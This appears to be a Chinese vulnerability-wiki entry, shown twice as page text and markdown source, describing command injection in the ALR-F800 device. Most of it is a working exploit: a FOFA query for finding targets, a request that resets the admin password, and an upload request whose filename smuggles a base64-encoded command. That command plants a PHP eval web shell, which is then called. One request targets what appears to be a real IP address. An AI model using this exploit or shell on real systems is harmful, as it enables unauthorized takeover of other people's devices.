fofamini-wiki

登录白背景

源码

ALR-F800存在命令注入漏洞

一、漏洞简介

ALR-F800存在命令注入漏洞

二、影响版本

ALR-F800

三、资产测绘

fofa"ALR-F800"

四、漏洞复现

POST /cmd.php HTTP/1.1
Host: 
Accept-Ldwk: bG91ZG9uZ3dlbmt1
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

cmd=password=niubi123

先重置密码，重置完成之后，发送下面请求包

POST /cgi-bin/upgrade.cgi HTTP/1.1
Host: 98.152.108.61
Authorization: Basic YWxpZW46cGFzc3dvcmQx
Content-Length: 301
Accept-Ldwk: bG91ZG9uZ3dlbmt1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQ3keNKAe5AQ9G7bs

------WebKitFormBoundaryQ3keNKAe5AQ9G7bs
Content-Disposition: form-data; name="uploadedFile"; filename=";echo ZWNobyAiPD9waHAgZXZhbChcJF9SRVFVRVNUWydjbWQnXSk7Pz4iID4gL3Zhci93d3cvc2hlbGwucGhw| base64 -d | sh"
Content-Type: application/octet-stream

niubi
------WebKitFormBoundaryQ3keNKAe5AQ9G7bs

/shell.php?cmd=phpinfo();

原文: https://www.yuque.com/xiaokp7/ocvun2/ykp0xyq62wh521np

# ALR-F800存在命令注入漏洞

# 一、漏洞简介
ALR-F800存在命令注入漏洞

# 二、影响版本
+ ALR-F800

# 三、资产测绘
+ fofa`"ALR-F800"`

![1723139815674-82d991cc-a2b9-4416-9bc8-af959e0bd1db.png](./img/4WGhvRf4tT4xMhZj/1723139815674-82d991cc-a2b9-4416-9bc8-af959e0bd1db-953828.png)

# 四、漏洞复现
```plain
POST /cmd.php HTTP/1.1
Host: 
Accept-Ldwk: bG91ZG9uZ3dlbmt1
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

cmd=password=niubi123
```

![1723139754409-50a9704c-17dd-4f21-9fdf-beb2a2cd3370.png](./img/4WGhvRf4tT4xMhZj/1723139754409-50a9704c-17dd-4f21-9fdf-beb2a2cd3370-846595.png)

先重置密码，重置完成之后，发送下面请求包

```plain
POST /cgi-bin/upgrade.cgi HTTP/1.1
Host: 98.152.108.61
Authorization: Basic YWxpZW46cGFzc3dvcmQx
Content-Length: 301
Accept-Ldwk: bG91ZG9uZ3dlbmt1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQ3keNKAe5AQ9G7bs

------WebKitFormBoundaryQ3keNKAe5AQ9G7bs
Content-Disposition: form-data; name="uploadedFile"; filename=";echo ZWNobyAiPD9waHAgZXZhbChcJF9SRVFVRVNUWydjbWQnXSk7Pz4iID4gL3Zhci93d3cvc2hlbGwucGhw| base64 -d | sh"
Content-Type: application/octet-stream

niubi
------WebKitFormBoundaryQ3keNKAe5AQ9G7bs
```

![1723140220050-d52abb6d-57df-44ce-a0c9-4835e731b06e.png](./img/4WGhvRf4tT4xMhZj/1723140220050-d52abb6d-57df-44ce-a0c9-4835e731b06e-132082.png)

```plain
/shell.php?cmd=phpinfo();
```

![1723140248153-f35fe129-8b5c-4599-8047-19c074f3e7ce.png](./img/4WGhvRf4tT4xMhZj/1723140248153-f35fe129-8b5c-4599-8047-19c074f3e7ce-732048.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ykp0xyq62wh521np>